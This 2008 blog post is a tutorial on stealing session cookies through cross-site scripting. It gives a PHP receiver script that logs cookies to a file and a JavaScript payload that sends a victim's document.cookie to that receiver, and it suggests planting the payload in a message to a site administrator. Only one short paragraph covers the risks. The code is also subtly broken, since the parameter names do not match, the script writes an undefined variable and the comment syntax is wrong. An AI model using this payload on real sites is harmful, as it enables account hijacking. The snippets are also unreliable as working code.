Google

Thursday, February 14, 2008

Cookie Stealing

Let's first start off by describing what this is, how to implement it, and why you need to protect against it.

Cookie Stealing:
Cookie Stealing is composed of two parts: a Sender and a Receiver. The sender is basically just something that sends the cookie to the receiver. How to implement a sender will be discussed later. Now a receiver is something that receives the information from the sender. Although this sounds somewhat simple, it can sometimes be complex.

Implementation:
The following is a sample PHP script for a receiver:

< ? p h p
\\Tells the web server to use php(Please note it isn't filled with spaces normally \\this was done due to restrictions on blogspot)
$hijackedcookie = $HTTP_GET_VARS["cookie"];
\\Takes cookie from the sender and stores it
$file = fopen('cookielog.txt', 'a');
\\Opens the text file and stores it as a variable
fwrite($file, $cookie . "\n\n");
\\Writes the cookie to the text file
?>
\\As with most languages, it has to tell the server it is done with the program it \\was using prior(IE < / h t m l>)


Now, that would be placed on some remote server. For our example we'll be using localhost as to not actually point to someone's site. Now that we have our receiver, we'll move on to a way to get the information sent to it. On to the sender. The following is a snippet that can potentially be used to steal the cookie:


< script language="JavaScript">
document.location="http://localhost/receiver.php?hijackedcookie=" + document.cookie;
< /script>


Now the tricky part, is using the above to grab the cookie. This can be done by, say sending the administrator on a site a message(of course js has to be enabled on the site, and allowed. Not to mention the site must contain a user to user messaging system) Now once the administrator opens the message, the script is ran, sending the receiver the current cookie he is using.

Security Risks:
It is quite obvious that this poses a huge security risk. If someone gets a hold of a cookie, they can pose as that user. Which would give them all of the access rights that said user had on the site. For instance, if done to an web admin, the hijacker now has rights to view/delete anything and everything on the website that the admin can from a browser.



*The above information was gathered from multiple websites, but mostly http://www.freakwolfe.cheezyfilms.com/
Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)